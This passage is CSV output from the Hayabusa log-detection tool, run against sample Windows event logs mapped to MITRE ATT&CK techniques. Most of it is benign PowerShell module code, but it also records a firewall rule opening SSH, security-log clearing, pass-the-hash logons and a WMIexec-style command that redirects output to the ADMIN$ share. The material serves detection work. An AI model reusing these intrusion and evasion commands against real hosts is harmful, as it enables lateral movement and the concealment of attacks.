($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DomainController')) { [object]$__cmdletization_value = ${DomainController} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DomainController'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DomainController'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'GPOSession'; ParameterType = 'System.String'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Open', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetGPO.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Open-NetGPO' -Alias '*' function Save-NetGPO { [CmdletBinding(PositionalBinding=$false)] param( [Parameter(ParameterSetName='Save1', Mandatory=$true, Position=0)] [string] ${GPOSession}, [Parameter(ParameterSetName='Save1')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Save1')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Save1')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Save', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetGPO.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Save-NetGPO' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.555 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetGPO' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Open-NetGPO { [CmdletBinding(PositionalBinding=$false)] [OutputType([System.String])] param( [Parameter(ParameterSetName='Open0', Mandatory=$true, Position=0)] [string] ${PolicyStore}, [Parameter(ParameterSetName='Open0')] [string] ${DomainController}, [Parameter(ParameterSetName='Open0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Open0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Open0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DomainController')) { [object]$__cmdletization_value = ${DomainController} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DomainController'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DomainController'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'GPOSession'; ParameterType = 'System.String'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Open', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetGPO.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Open-NetGPO' -Alias '*' function Save-NetGPO { [CmdletBinding(PositionalBinding=$false)] param( [Parameter(ParameterSetName='Save1', Mandatory=$true, Position=0)] [string] ${GPOSession}, [Parameter(ParameterSetName='Save1')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Save1')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Save1')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Save', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetGPO.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Save-NetGPO' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.555 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.556 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.556 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Open-NetGPO"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.557 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Save-NetGPO"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.683 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:46.214 +09:00,srvdefender01.offsec.lan,2004,medium,,Added Rule in Windows Firewall with Advanced Security,,../hayabusa-rules/sigma/builtin/firewall_as/win_firewall_as_add_rule.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:46.469 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-NetFirewallRule): ""New-NetFirewallRule"" ParameterBinding(New-NetFirewallRule): name=""Name""; value=""sshd"" ParameterBinding(New-NetFirewallRule): name=""DisplayName""; value=""OpenSSH Server (sshd)"" ParameterBinding(New-NetFirewallRule): name=""Enabled""; value=""True"" ParameterBinding(New-NetFirewallRule): name=""Direction""; value=""Inbound"" ParameterBinding(New-NetFirewallRule): name=""Protocol""; value=""TCP"" ParameterBinding(New-NetFirewallRule): name=""Action""; value=""Allow"" ParameterBinding(New-NetFirewallRule): name=""LocalPort""; value=""22"" ParameterBinding(New-NetFirewallRule): name=""PolicyStore""; value="""" ParameterBinding(New-NetFirewallRule): name=""GPOSession""; value="""" ParameterBinding(New-NetFirewallRule): name=""Description""; value="""" ParameterBinding(New-NetFirewallRule): name=""Group""; value="""" ParameterBinding(New-NetFirewallRule): name=""LooseSourceMapping""; value=""False"" ParameterBinding(New-NetFirewallRule): name=""LocalOnlyMapping""; value=""False"" ParameterBinding(New-NetFirewallRule): name=""Owner""; value="""" ParameterBinding(New-NetFirewallRule): name=""Program""; value="""" ParameterBinding(New-NetFirewallRule): name=""Package""; value="""" ParameterBinding(New-NetFirewallRule): name=""Service""; value="""" ParameterBinding(New-NetFirewallRule): name=""LocalUser""; value="""" ParameterBinding(New-NetFirewallRule): name=""RemoteUser""; value="""" ParameterBinding(New-NetFirewallRule): name=""RemoteMachine""; value="""" ParameterBinding(New-NetFirewallRule): name=""OverrideBlockRules""; value=""False"" ParameterBinding(New-NetFirewallRule): name=""ThrottleLimit""; value=""0"" ParameterBinding(New-NetFirewallRule): name=""AsJob""; value=""False""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:46.471 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default"" ParameterBinding(Out-Default): name=""InputObject""; value=""MSFT_NetFirewallRule (CreationClassName = ""MSFT?FW?FirewallRule?sshd"", PolicyRuleName = """", SystemCreationClassName = """", SystemName = """")""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:46.472 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:46.475 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:10:03.015 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x3cc | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-26 17:25:31.043 +09:00,srvdefender01.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" 2021-04-26 17:25:36.560 +09:00,srvdefender01.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x4da321f,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" 2021-04-26 17:25:36.560 +09:00,srvdefender01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x4da321f,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" 2021-04-26 17:25:36.560 +09:00,srvdefender01.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" 2021-04-26 17:25:36.584 +09:00,srvdefender01.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x4da324f,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" 2021-04-26 17:25:36.584 +09:00,srvdefender01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x4da324f,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" 2021-04-26 17:25:36.686 +09:00,srvdefender01.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x4da3273,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" 2021-04-26 17:25:36.686 +09:00,srvdefender01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x4da3273,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" 2021-04-26 17:25:36.852 +09:00,srvdefender01.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x4da3292,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" 2021-04-26 17:25:36.852 +09:00,srvdefender01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x4da3292,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" 2021-04-26 17:25:36.913 +09:00,srvdefender01.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x4da32af,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" 2021-04-26 17:25:36.913 +09:00,srvdefender01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x4da32af,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" 2021-04-26 17:25:37.258 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: cmd.exe /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__1619425227.894209 2>&1 | Path: C:\Windows\System32\cmd.exe | PID: 0xd44 | User: SRVDEFENDER01$ | LID: 0x3e4,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" 2021-04-26 17:25:37.313 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" 2021-04-26 17:25:37.325 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" 2021-04-26 17:25:37.329 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" 2021-04-26 17:25:37.332 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 